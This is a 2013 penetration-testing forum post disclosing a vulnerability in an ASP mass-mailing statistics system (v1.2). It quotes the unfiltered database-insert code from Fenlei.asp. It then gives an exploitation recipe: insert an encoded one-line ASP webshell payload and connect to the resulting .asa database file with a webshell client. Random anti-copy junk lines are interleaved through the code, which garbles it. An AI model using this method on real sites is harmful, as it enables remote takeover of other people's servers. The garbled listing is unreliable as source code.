中国网络渗透测试联盟
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
[打印本页]
作者:
admin
时间:
2013-3-14 20:14
标题:
铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
6 k! [; e' K' p! Y% @$ H
8 c% j) |" L6 q* f' g: m J2 \
IF Request.QueryString("Action")="del" Then
% y1 n% x% T. l- r/ M: z! L6 \- L
ID=Request.QueryString("ID")
. d) \2 S; ^4 c
IF Countss ("tui","Fenlei",ID )<>0 then
7 D' ]7 ?. x# b
'略
4 \1 |( z7 I, k+ ~4 _( _ W
IF Request.QueryString("Action")="Add" Then
5 f! Z. h( |. A' v' d) E
Tname=Request.Form("Typename")
+ [/ b& k3 T8 X; J2 i
Set Rs=Server.CreateObject("adodb.Recordset")
: a6 t9 {& y. k/ s$ l7 ?% C
Sql="Select * From Fenlei Order by id Desc "
- Y( D. V8 y( g/ B7 |- y
Rs.Open Sql,Conn,1,3
5 B7 B- |) X0 I8 G; O- Q: y1 i" R. U
Rs.Addnew
6 L5 K4 l9 @6 I' G$ p2 s* X6 N
Rs("Typename")=Tname
/ K: ]/ \% _/ j8 s M6 g- t# a
'略
9 F4 Z: P4 K* Q# P2 r
Set Rs=Server.CreateObject("adodb.Recordset")
/ M- Y5 L' Q+ T( j) f" i
Sql="Select * From Fenlei Order by id Desc "
: x+ c4 Q# w; W) \7 m6 L
Rs.Open Sql,Conn,1,1
- u# l7 U2 n& w/ g
'略
D( z/ P. n* Y, q; w; w) Y* z
%>
7 i, e2 w/ g! w
2 ]8 M7 I {4 W' K6 e$ g d8 m
5 x. K. \$ N: F Y/ G; W9 g7 W- R
/ K: @( _: r# K) K
没有过滤,直接写入数据库。
6 r5 w: D- z" n) }
+ [2 w, H. w S/ S' |/ J9 N
利用方法:
. d4 J1 ]( B- {' i: n* z, i
$ s5 N8 Q0 B9 ~ ]' d
插入:┼攠數畣整爠煥敵瑳∨≡┩>
6 T) c5 X9 _! o3 L6 }; `& h7 c
3 m" l% |1 S9 Q! X+ K" v- W* @
( h' V5 `5 Y3 O- n. B: D7 d
连接:
http://www.xxx.com/###tongbaner.asa
% V& J) d2 ?- U7 g
'默认安装文件:
; k0 b8 n$ `$ u" S
'install.asp
4 n/ j4 W) `% E b
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2